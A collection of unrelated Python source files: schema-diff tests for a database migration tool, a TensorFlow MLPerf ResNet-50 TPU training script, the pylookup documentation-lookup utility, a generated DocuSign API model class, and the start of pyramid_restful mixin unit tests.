diff = self._run_diff(excludeTables=('xtable','ytable'))
# ytable only in database
# xtable only in model
# ztable identical on both
# ...so we expect no diff!
self.assertFalse(diff)
eq_('No schema diffs',str(diff))
@fixture.usedb()
def test_identical_just_pk(self):
self._make_table()
diff = self._run_diff()
self.assertFalse(diff)
eq_('No schema diffs',str(diff))
@fixture.usedb()
def test_different_type(self):
self._assert_diff(
Column('data', String(10)),
Column('data', Integer()),
)
@fixture.usedb()
def test_int_vs_float(self):
self._assert_diff(
Column('data', Integer()),
Column('data', Float()),
)
@fixture.usedb()
def test_float_vs_numeric(self):
self._assert_diff(
Column('data', Float()),
Column('data', Numeric()),
)
@fixture.usedb()
def test_numeric_precision(self):
self._assert_diff(
Column('data', Numeric(precision=5)),
Column('data', Numeric(precision=6)),
)
@fixture.usedb()
def test_numeric_scale(self):
self._assert_diff(
Column('data', Numeric(precision=6,scale=0)),
Column('data', Numeric(precision=6,scale=1)),
)
@fixture.usedb()
def test_string_length(self):
self._assert_diff(
Column('data', String(10)),
Column('data', String(20)),
)
@fixture.usedb()
def test_integer_identical(self):
self._make_table(
Column('data', Integer()),
)
diff = self._run_diff()
eq_('No schema diffs',str(diff))
self.assertFalse(diff)
@fixture.usedb()
def test_string_identical(self):
self._make_table(
Column('data', String(10)),
)
diff = self._run_diff()
eq_('No schema diffs',str(diff))
self.assertFalse(diff)
@fixture.usedb()
def test_text_identical(self):
self._make_table(
Column('data', Text(255)),
)
diff = self._run_diff()
eq_('No schema diffs',str(diff))
self.assertFalse(diff)
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train a ResNet-50 model on ImageNet on TPU."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl import app
from absl import flags
import numpy as np
import tensorflow.compat.v1 as tf
from REDACTED.tensorflow_models.mlperf.models.rough.mlp_log import mlp_log
from REDACTED.tensorflow_models.mlperf.models.rough.resnet import imagenet_input
from REDACTED.tensorflow_models.mlperf.models.rough.resnet import lars_util
from REDACTED.tensorflow_models.mlperf.models.rough.resnet import resnet_model
from REDACTED.tensorflow_models.mlperf.models.rough.util import train_and_eval_runner
FLAGS = flags.FLAGS
# Model specific flags
flags.DEFINE_string(
'data_dir', default=None,
help=('The directory where the ImageNet input data is stored. Please see'
' the README.md for the expected data format.'))
flags.DEFINE_integer(
'resnet_depth', default=50,
help=('Depth of ResNet model to use. Must be one of {18, 34, 50, 101, 152,'
' 200}. ResNet-18 and 34 use the pre-activation residual blocks'
' without bottleneck layers. The other models use pre-activation'
' bottleneck layers. Deeper models require more training time and'
' more memory and may require reducing --train_batch_size to prevent'
' running out of memory.'))
flags.DEFINE_integer(
'train_steps', default=112590,
help=('The number of steps to use for training. Default is 112590 steps'
' which is approximately 90 epochs at batch size 1024. This flag'
' should be adjusted according to the --train_batch_size flag.'))
flags.DEFINE_integer(
'train_batch_size', default=1024, help='Batch size for training.')
flags.DEFINE_integer(
'eval_batch_size', default=1024, help='Batch size for evaluation.')
flags.DEFINE_integer(
'num_train_images', default=1281167, help='Size of training data set.')
flags.DEFINE_integer(
'num_eval_images', default=50000, help='Size of evaluation data set.')
flags.DEFINE_integer(
'num_label_classes', default=1000, help='Number of classes, at least 2')
flags.DEFINE_integer(
'steps_per_eval', default=1251,
help=('Controls how often evaluation is performed. Since evaluation is'
' fairly expensive, it is advised to evaluate as infrequently as'
' possible (i.e. up to --train_steps, which evaluates the model only'
' after finishing the entire training regime).'))
flags.DEFINE_integer(
'iterations_per_loop', default=1251,
help=('Number of steps to run on TPU before outfeeding metrics to the CPU.'
' If the number of iterations in the loop would exceed the number of'
' train steps, the loop will exit before reaching'
' --iterations_per_loop. The larger this value is, the higher the'
' utilization on the TPU.'))
flags.DEFINE_integer(
'dataset_threadpool_size', default=48,
help=('The size of the private datapool size in dataset.'))
flags.DEFINE_integer('num_replicas', default=8, help=('Number of replicas.'))
flags.DEFINE_string(
'precision', default='bfloat16',
help=('Precision to use; one of: {bfloat16, float32}'))
flags.DEFINE_float(
'base_learning_rate', default=0.1,
help=('Base learning rate when train batch size is 256.'))
flags.DEFINE_float(
'momentum', default=0.9,
help=('Momentum parameter used in the MomentumOptimizer.'))
flags.DEFINE_float(
'weight_decay', default=1e-4,
help=('Weight decay coefficiant for l2 regularization.'))
flags.DEFINE_float(
'label_smoothing', default=0.0,
help=('Label smoothing parameter used in the softmax_cross_entropy'))
flags.DEFINE_bool('enable_lars',
default=False,
help=('Enable LARS optimizer for large batch training.'))
flags.DEFINE_float('poly_rate', default=0.0,
help=('Set LARS/Poly learning rate.'))
flags.DEFINE_float(
'stop_threshold', default=0.759, help=('Stop threshold for MLPerf.'))
flags.DEFINE_integer('image_size', 224, 'The input image size.')
flags.DEFINE_integer(
'distributed_group_size',
default=1,
help=('When set to > 1, it will enable distributed batch normalization'))
tf.flags.DEFINE_multi_integer(
'input_partition_dims',
default=None,
help=('Number of partitions on each dimension of the input. Each TPU core'
' processes a partition of the input image in parallel using spatial'
' partitioning.'))
flags.DEFINE_bool(
'use_space_to_depth',
default=False,
help=('Enable space-to-depth optimization for conv-0.'))
# Learning rate schedule
LR_SCHEDULE = [ # (multiplier, epoch to start) tuples
(1.0, 5), (0.1, 30), (0.01, 60), (0.001, 80)
]
# The input tensor is in the range of [0, 255], we need to scale them to the
# range of [0, 1]
MEAN_RGB = [0.485 * 255, 0.456 * 255, 0.406 * 255]
STDDEV_RGB = [0.229 * 255, 0.224 * 255, 0.225 * 255]
def learning_rate_schedule(current_epoch):
"""Handles linear scaling rule, gradual warmup, and LR decay.
The learning rate starts at 0, then it increases linearly per step.
After 5 epochs we reach the base learning rate (scaled to account
for batch size).
After 30, 60 and 80 epochs the learning rate is divided by 10.
After 90 epochs training stops and the LR is set to 0. This ensures
that we train for exactly 90 epochs for reproducibility.
Args:
current_epoch: `Tensor` for current epoch.
Returns:
A scaled `Tensor` for current learning rate.
"""
mlp_log.mlperf_print('lars_opt_base_learning_rate', FLAGS.base_learning_rate)
scaled_lr = FLAGS.base_learning_rate * (FLAGS.train_batch_size / 256.0)
decay_rate = (scaled_lr * LR_SCHEDULE[0][0] *
current_epoch / LR_SCHEDULE[0][1])
for mult, start_epoch in LR_SCHEDULE:
decay_rate = tf.where(current_epoch < start_epoch,
decay_rate, scaled_lr * mult)
return decay_rate
def resnet_model_fn(features, labels, is_training):
"""The model_fn for ResNet to be used with TPU.
Args:
features: `Tensor` of batched images.
labels: `Tensor` of labels for the data samples
is_training: whether this is training
Returns:
train_op, logits
"""
if isinstance(features, dict):
features = features['feature']
if FLAGS.use_space_to_depth:
if FLAGS.train_batch_size // FLAGS.num_replicas > 8:
features = tf.reshape(
features, [FLAGS.image_size // 2, FLAGS.image_size // 2, 12, -1])
features = tf.transpose(features, [3, 0, 1, 2]) # HWCN to NHWC
else:
features = tf.reshape(
features, [FLAGS.image_size // 2, FLAGS.image_size // 2, -1, 12])
features = tf.transpose(features, [2, 0, 1, 3]) # HWNC to NHWC
else:
if FLAGS.train_batch_size // FLAGS.num_replicas > 8:
features = tf.reshape(features,
[FLAGS.image_size, FLAGS.image_size, 3, -1])
features = tf.transpose(features, [3, 0, 1, 2]) # HWCN to NHWC
else:
features = tf.reshape(features,
[FLAGS.image_size, FLAGS.image_size, -1, 3])
features = tf.transpose(features, [2, 0, 1, 3]) # HWCN to NHWC
# Normalize the image to zero mean and unit variance.
if FLAGS.use_space_to_depth:
features -= tf.constant(MEAN_RGB, shape=[1, 1, 12], dtype=features.dtype)
features /= tf.constant(STDDEV_RGB, shape=[1, 1, 12], dtype=features.dtype)
else:
features -= tf.constant(MEAN_RGB, shape=[1, 1, 3], dtype=features.dtype)
features /= tf.constant(STDDEV_RGB, shape=[1, 1, 3], dtype=features.dtype)
# This nested function allows us to avoid duplicating the logic which
# builds the network, for different values of --precision.
def build_network():
with tf.variable_scope('resnet', reuse=tf.AUTO_REUSE):
network = resnet_model.resnet_v1(
resnet_depth=FLAGS.resnet_depth,
num_classes=FLAGS.num_label_classes,
use_space_to_depth=FLAGS.use_space_to_depth,
num_replicas=FLAGS.num_replicas,
distributed_group_size=FLAGS.distributed_group_size)
return network(inputs=features, is_training=is_training)
if FLAGS.precision == 'bfloat16':
with tf.tpu.bfloat16_scope():
logits = build_network()
logits = tf.cast(logits, tf.float32)
elif FLAGS.precision == 'float32':
logits = build_network()
if not is_training:
total_correct = tf.reduce_sum(
tf.cast(
tf.equal(tf.cast(tf.argmax(logits, axis=1), labels.dtype), labels),
tf.int32))
return None, {'total_correct': tf.reshape(total_correct, [-1])}
# Calculate loss, which includes softmax cross entropy and L2 regularization.
one_hot_labels = tf.one_hot(labels, FLAGS.num_label_classes)
cross_entropy = tf.losses.softmax_cross_entropy(
logits=logits,
onehot_labels=one_hot_labels,
label_smoothing=FLAGS.label_smoothing)
# Add weight decay to the loss for non-batch-normalization variables.
if FLAGS.enable_lars:
loss = cross_entropy
else:
loss = cross_entropy + FLAGS.weight_decay * tf.add_n([
tf.nn.l2_loss(v)
for v in tf.trainable_variables()
if 'batch_normalization' not in v.name
])
global_step = tf.train.get_or_create_global_step()
steps_per_epoch = FLAGS.num_train_images / FLAGS.train_batch_size
current_epoch = (tf.cast(global_step, tf.float32) / steps_per_epoch)
mlp_log.mlperf_print(
'model_bn_span',
FLAGS.distributed_group_size *
(FLAGS.train_batch_size // FLAGS.num_replicas))
if FLAGS.enable_lars:
learning_rate = 0.0
mlp_log.mlperf_print('opt_name', 'lars')
optimizer = lars_util.init_lars_optimizer(current_epoch)
else:
mlp_log.mlperf_print('opt_name', 'sgd')
learning_rate = learning_rate_schedule(current_epoch)
optimizer = tf.train.MomentumOptimizer(
learning_rate=learning_rate, momentum=FLAGS.momentum, use_nesterov=True)
optimizer = tf.tpu.CrossShardOptimizer(optimizer)
# Batch normalization requires UPDATE_OPS to be added as a dependency to
# the train operation.
with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
train_op = optimizer.minimize(loss, global_step)
return train_op, None
def main(unused_argv):
def eval_init_fn(cur_step):
"""Executed before every eval."""
steps_per_epoch = FLAGS.num_train_images / FLAGS.train_batch_size
epoch = cur_step // steps_per_epoch
mlp_log.mlperf_print(
'block_start',
None,
metadata={
'first_epoch_num': epoch,
'epoch_count': 4
})
def eval_finish_fn(cur_step, eval_output, summary_writer):
"""Executed after every eval."""
steps_per_epoch = FLAGS.num_train_images / FLAGS.train_batch_size
epoch = cur_step // steps_per_epoch
eval_accuracy = float(np.sum(
eval_output['total_correct'])) / FLAGS.num_eval_images
if summary_writer:
with tf.Graph().as_default():
summary_writer.add_summary(
tf.Summary(value=[
tf.Summary.Value(tag='accuracy', simple_value=eval_accuracy)
]), cur_step)
mlp_log.mlperf_print(
'eval_accuracy',
eval_accuracy,
metadata={
'epoch_num': epoch + FLAGS.iterations_per_loop // steps_per_epoch
})
mlp_log.mlperf_print(
'block_stop',
None,
metadata={
'first_epoch_num': epoch,
'epoch_count': 4
})
if eval_accuracy >= FLAGS.stop_threshold:
mlp_log.mlperf_print('run_stop', None, metadata={'status': 'success'})
return True
else:
return False
def run_finish_fn(success):
if not success:
mlp_log.mlperf_print('run_stop', None, metadata={'status': 'abort'})
mlp_log.mlperf_print('run_final', None)
low_level_runner = train_and_eval_runner.TrainAndEvalRunner(
FLAGS.iterations_per_loop, FLAGS.train_steps,
int(math.ceil(FLAGS.num_eval_images / FLAGS.eval_batch_size)),
FLAGS.num_replicas)
mlp_log.mlperf_print('cache_clear', True)
mlp_log.mlperf_print('init_start', None)
mlp_log.mlperf_print('global_batch_size', FLAGS.train_batch_size)
mlp_log.mlperf_print('lars_opt_weight_decay', FLAGS.weight_decay)
mlp_log.mlperf_print('lars_opt_momentum', FLAGS.momentum)
mlp_log.mlperf_print('submission_benchmark', 'resnet')
mlp_log.mlperf_print('submission_division', 'closed')
mlp_log.mlperf_print('submission_org', 'google')
mlp_log.mlperf_print('submission_platform', 'tpu-v3-%d' % FLAGS.num_replicas)
mlp_log.mlperf_print('submission_status', 'research')
assert FLAGS.precision == 'bfloat16' or FLAGS.precision == 'float32', (
'Invalid value for --precision flag; must be bfloat16 or float32.')
input_dtype = tf.bfloat16 if FLAGS.precision == 'bfloat16' else tf.float32
cache_decoded_image = True if FLAGS.num_replicas > 2048 else False
imagenet_train, imagenet_eval = [
imagenet_input.get_input_fn( # pylint: disable=g-complex-comprehension
FLAGS.data_dir,
is_training,
input_dtype,
FLAGS.image_size,
FLAGS.input_partition_dims is None,
cache_decoded_image=cache_decoded_image)
for is_training in [True, False]
]
low_level_runner.initialize(imagenet_train, imagenet_eval, resnet_model_fn,
FLAGS.train_batch_size, FLAGS.eval_batch_size,
FLAGS.input_partition_dims)
mlp_log.mlperf_print('train_samples', FLAGS.num_train_images)
mlp_log.mlperf_print('eval_samples', FLAGS.num_eval_images)
mlp_log.mlperf_print('init_stop', None)
mlp_log.mlperf_print('run_start', None)
low_level_runner.train_and_eval(eval_init_fn, eval_finish_fn, run_finish_fn)
if __name__ == '__main__':
app.run(main)
|
|
#!/usr/bin/env python2
"""
Pylookup is to lookup entries from python documentation, especially within
emacs. Pylookup adopts most of ideas from haddoc, lovely toolkit by Martin
Blais.
(usage)
./pylookup.py -l ljust
./pylookup.py -u http://docs.python.org
"""
from __future__ import with_statement
import os
import sys
import re
try:
import cPickle as pickle
except:
import pickle
import formatter
from os.path import join, dirname, exists, abspath, expanduser
from contextlib import closing
if sys.version_info[0] == 3:
import html.parser as htmllib
import urllib.parse as urlparse
import urllib.request as urllib
else:
import htmllib, urllib, urlparse
VERBOSE = False
FORMATS = {
"Emacs" : "{entry}\t({desc})\t[{book}];{url}",
"Terminal" : "{entry}\t({desc})\t[{book}]\n{url}"
}
def build_book(s, num):
"""
Build book identifier from `s`, with `num` links.
"""
for matcher, replacement in (("library", "lib"),
("c-api", "api"),
("reference", "ref"),
("", "etc")):
if matcher in s:
return replacement if num == 1 else "%s/%d" % (replacement, num)
def trim(s):
"""
Add any globle filtering rules here
"""
s = s.replace( "Python Enhancement Proposals!", "")
s = s.replace( "PEP ", "PEP-")
return s
class Element(object):
def __init__(self, entry, desc, book, url):
self.book = book
self.url = url
self.desc = desc
self.entry = entry
def __format__(self, format_spec):
return format_spec.format(entry=self.entry, desc=self.desc,
book=self.book, url=self.url)
def match_insensitive(self, key):
"""
Match key case insensitive against entry and desc.
`key` : Lowercase string.
"""
return key in self.entry.lower() or key in self.desc.lower()
def match_sensitive(self, key):
"""
Match key case sensitive against entry and desc.
`key` : Lowercase string.
"""
return key in self.entry or key in self.desc
def match_in_entry_insensitive(self, key):
"""
Match key case insensitive against entry.
`key` : Lowercase string.
"""
return key in self.entry.lower()
def match_in_entry_sensitive(self, key):
"""
Match key case sensitive against entry.
`key` : Lowercase string.
"""
return key in self.entry
def get_matcher(insensitive=True, desc=True):
"""
Get `Element.match_*` function.
>>> get_matcher(0, 0)
<unbound method Element.match_in_entry_sensitive>
>>> get_matcher(1, 0)
<unbound method Element.match_in_entry_insensitive>
>>> get_matcher(0, 1)
<unbound method Element.match_sensitive>
>>> get_matcher(1, 1)
<unbound method Element.match_insensitive>
"""
_sensitive = "_insensitive" if insensitive else "_sensitive"
_in_entry = "" if desc else "_in_entry"
return getattr(Element, "match{0}{1}".format(_in_entry, _sensitive))
class IndexProcessor( htmllib.HTMLParser ):
"""
Extract the index links from a Python HTML documentation index.
"""
def __init__( self, writer, dirn):
htmllib.HTMLParser.__init__( self, formatter.NullFormatter() )
self.writer = writer
self.dirn = dirn
self.entry = ""
self.desc = ""
self.list_entry = False
self.do_entry = False
self.one_entry = False
self.num_of_a = 0
self.desc_cnt = 0
def start_dd( self, att ):
self.list_entry = True
def end_dd( self ):
self.list_entry = False
def start_dt( self, att ):
self.one_entry = True
self.num_of_a = 0
def end_dt( self ):
self.do_entry = False
def start_a( self, att ):
if self.one_entry:
self.url = join( self.dirn, dict( att )[ 'href' ] )
self.save_bgn()
def end_a( self ):
global VERBOSE
if self.one_entry:
if self.num_of_a == 0 :
self.desc = self.save_end()
if VERBOSE:
self.desc_cnt += 1
if self.desc_cnt % 100 == 0:
sys.stdout.write("%04d %s\r" \
% (self.desc_cnt, self.desc.ljust(80)))
# extract fist element
# ex) __and__() (in module operator)
if not self.list_entry :
self.entry = re.sub( "\([^)]+\)", "", self.desc )
# clean up PEP
self.entry = trim(self.entry)
match = re.search( "\([^)]+\)", self.desc )
if match :
self.desc = match.group(0)
self.desc = trim(re.sub( "[()]", "", self.desc ))
self.num_of_a += 1
book = build_book(self.url, self.num_of_a)
e = Element(self.entry, self.desc, book, self.url)
self.writer(e)
def update(db, urls, append=False):
"""Update database with entries from urls.
`db` : filename to database
`urls` : list of URL
`append` : append to db
"""
mode = "ab" if append else "wb"
with open(db, mode) as f:
writer = lambda e: pickle.dump(e, f)
for url in urls:
# detech 'file' or 'url' schemes
parsed = urlparse.urlparse(url)
if not parsed.scheme or parsed.scheme == "file":
dst = abspath(expanduser(parsed.path))
if not os.path.exists(dst):
print("Error: %s doesn't exist" % dst)
exit(1)
url = "file://%s" % dst
else:
url = parsed.geturl()
potential_urls = []
if url.endswith('.html'):
potential_urls.append(url)
else:
# guess index URLs
# for stdlib, this is genindex-all.html
# for django, numpy, etc. it's genindex.html
url = url.rstrip("/")
potential_urls.append(url + "/genindex-all.html")
potential_urls.append(url + "/genindex.html")
success = False
for index_url in potential_urls:
try:
print "Wait for a few seconds..."
print "Fetching index from '%s'" % index_url
index = urllib.urlopen(index_url).read()
if not issubclass(type(index), str):
index = index.decode()
parser = IndexProcessor(writer, dirname(index_url))
with closing(parser):
parser.feed(index)
# success, we don't need to try other potential urls
print "Loaded index from '%s'" % index_url
success = True
break
except IOError:
print "Error: fetching file from '%s'" % index_url
if not success:
print "Failed to load index for input '%s'" % url
def lookup(db, key, format_spec, out=sys.stdout, insensitive=True, desc=True):
"""Lookup key from database and print to out.
`db` : filename to database
`key` : key to lookup
`out` : file-like to write to
`insensitive` : lookup key case insensitive
"""
matcher = get_matcher(insensitive, desc)
if insensitive:
key = key.lower()
with open(db, "rb") as f:
try:
while True:
e = pickle.load(f)
if matcher(e, key):
out.write('%s\n' % format(e, format_spec))
except EOFError:
pass
def cache(db, out=sys.stdout):
"""Print unique entries from db to out.
`db` : filename to database
`out` : file-like to write to
"""
with open(db, "rb") as f:
keys = set()
try:
while True:
e = pickle.load(f)
k = e.entry
k = re.sub( "\([^)]*\)", "", k )
k = re.sub( "\[[^]]*\]", "", k )
keys.add(k)
except EOFError:
pass
for k in keys:
out.write('%s\n' % k)
if __name__ == "__main__":
import optparse
parser = optparse.OptionParser( __doc__.strip() )
parser.add_option( "-d", "--db",
help="database name",
dest="db", default="pylookup.db" )
parser.add_option( "-l", "--lookup",
help="keyword to search",
dest="key" )
parser.add_option( "-u", "--update",
help="update url or path",
action="append", type="str", dest="url" )
parser.add_option( "-c", "--cache" ,
help="extract keywords, internally used",
action="store_true", default=False, dest="cache")
parser.add_option( "-a", "--append",
help="append to the db from multiple sources",
action="store_true", default=False, dest="append")
parser.add_option( "-f", "--format",
help="type of output formatting, valid: Emacs, Terminal",
choices=["Emacs", "Terminal"],
default="Terminal", dest="format")
parser.add_option( "-i", "--insensitive", default=1, choices=['0', '1'],
help="SEARCH OPTION: insensitive search "
"(valid: 0, 1; default: %default)")
parser.add_option( "-s", "--desc", default=1, choices=['0', '1'],
help="SEARCH OPTION: include description field "
"(valid: 0, 1; default: %default)")
parser.add_option("-v", "--verbose",
help="verbose", action="store_true",
dest="verbose", default=False)
( opts, args ) = parser.parse_args()
VERBOSE = opts.verbose
if opts.url:
update(opts.db, opts.url, opts.append)
if opts.cache:
cache(opts.db)
if opts.key:
lookup(opts.db, opts.key, FORMATS[opts.format],
insensitive=int(opts.insensitive), desc=int(opts.desc))
|
|
# coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign. # noqa: E501
OpenAPI spec version: v2.1
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class WorkspaceUserAuthorization(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'can_delete': 'str',
'can_move': 'str',
'can_transact': 'str',
'can_view': 'str',
'created': 'str',
'created_by_id': 'str',
'error_details': 'ErrorDetails',
'modified': 'str',
'modified_by_id': 'str',
'workspace_user_id': 'str',
'workspace_user_information': 'WorkspaceUser'
}
attribute_map = {
'can_delete': 'canDelete',
'can_move': 'canMove',
'can_transact': 'canTransact',
'can_view': 'canView',
'created': 'created',
'created_by_id': 'createdById',
'error_details': 'errorDetails',
'modified': 'modified',
'modified_by_id': 'modifiedById',
'workspace_user_id': 'workspaceUserId',
'workspace_user_information': 'workspaceUserInformation'
}
def __init__(self, can_delete=None, can_move=None, can_transact=None, can_view=None, created=None, created_by_id=None, error_details=None, modified=None, modified_by_id=None, workspace_user_id=None, workspace_user_information=None): # noqa: E501
"""WorkspaceUserAuthorization - a model defined in Swagger""" # noqa: E501
self._can_delete = None
self._can_move = None
self._can_transact = None
self._can_view = None
self._created = None
self._created_by_id = None
self._error_details = None
self._modified = None
self._modified_by_id = None
self._workspace_user_id = None
self._workspace_user_information = None
self.discriminator = None
if can_delete is not None:
self.can_delete = can_delete
if can_move is not None:
self.can_move = can_move
if can_transact is not None:
self.can_transact = can_transact
if can_view is not None:
self.can_view = can_view
if created is not None:
self.created = created
if created_by_id is not None:
self.created_by_id = created_by_id
if error_details is not None:
self.error_details = error_details
if modified is not None:
self.modified = modified
if modified_by_id is not None:
self.modified_by_id = modified_by_id
if workspace_user_id is not None:
self.workspace_user_id = workspace_user_id
if workspace_user_information is not None:
self.workspace_user_information = workspace_user_information
@property
def can_delete(self):
"""Gets the can_delete of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The can_delete of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._can_delete
@can_delete.setter
def can_delete(self, can_delete):
"""Sets the can_delete of this WorkspaceUserAuthorization.
# noqa: E501
:param can_delete: The can_delete of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._can_delete = can_delete
@property
def can_move(self):
"""Gets the can_move of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The can_move of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._can_move
@can_move.setter
def can_move(self, can_move):
"""Sets the can_move of this WorkspaceUserAuthorization.
# noqa: E501
:param can_move: The can_move of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._can_move = can_move
@property
def can_transact(self):
"""Gets the can_transact of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The can_transact of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._can_transact
@can_transact.setter
def can_transact(self, can_transact):
"""Sets the can_transact of this WorkspaceUserAuthorization.
# noqa: E501
:param can_transact: The can_transact of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._can_transact = can_transact
@property
def can_view(self):
"""Gets the can_view of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The can_view of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._can_view
@can_view.setter
def can_view(self, can_view):
"""Sets the can_view of this WorkspaceUserAuthorization.
# noqa: E501
:param can_view: The can_view of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._can_view = can_view
@property
def created(self):
"""Gets the created of this WorkspaceUserAuthorization. # noqa: E501
The UTC DateTime when the workspace user authorization was created. # noqa: E501
:return: The created of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._created
@created.setter
def created(self, created):
"""Sets the created of this WorkspaceUserAuthorization.
The UTC DateTime when the workspace user authorization was created. # noqa: E501
:param created: The created of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._created = created
@property
def created_by_id(self):
"""Gets the created_by_id of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The created_by_id of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._created_by_id
@created_by_id.setter
def created_by_id(self, created_by_id):
"""Sets the created_by_id of this WorkspaceUserAuthorization.
# noqa: E501
:param created_by_id: The created_by_id of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._created_by_id = created_by_id
@property
def error_details(self):
"""Gets the error_details of this WorkspaceUserAuthorization. # noqa: E501
:return: The error_details of this WorkspaceUserAuthorization. # noqa: E501
:rtype: ErrorDetails
"""
return self._error_details
@error_details.setter
def error_details(self, error_details):
"""Sets the error_details of this WorkspaceUserAuthorization.
:param error_details: The error_details of this WorkspaceUserAuthorization. # noqa: E501
:type: ErrorDetails
"""
self._error_details = error_details
@property
def modified(self):
"""Gets the modified of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The modified of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._modified
@modified.setter
def modified(self, modified):
"""Sets the modified of this WorkspaceUserAuthorization.
# noqa: E501
:param modified: The modified of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._modified = modified
@property
def modified_by_id(self):
"""Gets the modified_by_id of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The modified_by_id of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._modified_by_id
@modified_by_id.setter
def modified_by_id(self, modified_by_id):
"""Sets the modified_by_id of this WorkspaceUserAuthorization.
# noqa: E501
:param modified_by_id: The modified_by_id of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._modified_by_id = modified_by_id
@property
def workspace_user_id(self):
"""Gets the workspace_user_id of this WorkspaceUserAuthorization. # noqa: E501
# noqa: E501
:return: The workspace_user_id of this WorkspaceUserAuthorization. # noqa: E501
:rtype: str
"""
return self._workspace_user_id
@workspace_user_id.setter
def workspace_user_id(self, workspace_user_id):
"""Sets the workspace_user_id of this WorkspaceUserAuthorization.
# noqa: E501
:param workspace_user_id: The workspace_user_id of this WorkspaceUserAuthorization. # noqa: E501
:type: str
"""
self._workspace_user_id = workspace_user_id
@property
def workspace_user_information(self):
"""Gets the workspace_user_information of this WorkspaceUserAuthorization. # noqa: E501
:return: The workspace_user_information of this WorkspaceUserAuthorization. # noqa: E501
:rtype: WorkspaceUser
"""
return self._workspace_user_information
@workspace_user_information.setter
def workspace_user_information(self, workspace_user_information):
"""Sets the workspace_user_information of this WorkspaceUserAuthorization.
:param workspace_user_information: The workspace_user_information of this WorkspaceUserAuthorization. # noqa: E501
:type: WorkspaceUser
"""
self._workspace_user_information = workspace_user_information
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(WorkspaceUserAuthorization, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WorkspaceUserAuthorization):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
|
import json
from unittest import TestCase, mock
import marshmallow as ma
from pyramid import testing
from pyramid.response import Response
from pyramid_restful import mixins
class MockAPIView:
def model_side_effect(**data):
instance = mock.Mock()
for key, val in data.items():
setattr(instance, key, val)
return instance
model = mock.Mock(side_effect=model_side_effect)
dataset = [
{'name': 'testing', 'id': 1},
{'name': 'testing 2', 'id': 2}
]
def get_query(self):
class MockQuery(list):
def __init__(self, *args):
super().__init__(*args)
def all(self):
return self
ret = MockQuery()
for data in self.dataset:
instance = mock.Mock()
for key, val in data.items():
setattr(instance, key, val)
ret.append(instance)
return ret
def filter_query(self, query):
return query
def get_schema(self, *args, **kwargs):
def dump(data, many=False, **kwargs):
if many:
return [{'id': i.id, 'name': i.name} for i in data], ''
return {'id': data.id, 'name': data.name}, ''
def load(data, partial=False):
if not partial and data['id'] == 4:
raise ma.ValidationError(message={'id': ['invalid value.']})
return data, ''
schema = mock.Mock()
schema.dump = mock.Mock(side_effect=dump)
schema.load = mock.Mock(side_effect=load)
return schema
def paginate_query(self, data):
return [data[0]]
def get_paginated_response(self, data):
return Response(json_body=data)
def get_object(self):
instance = mock.Mock()
for key, val in self.dataset[0].items():
setattr(instance, key, val)
return instance
class MockAPIViewNoPage(MockAPIView):
def paginate_query(self, data):
return None
class ActionMixinView(mixins.ActionSchemaMixin):
retrieve_schema = 'retrieve_schema'
list_schema = 'list_schema'
update_schema = 'update_schema'
create_schema = 'create_schema'
destroy_schema = 'destroy_schema'
schema_class = 'schema_class'
# ------ Tests ------
class ModelMixinUnitTests(TestCase):
def setUp(self):
self.request = testing.DummyRequest()
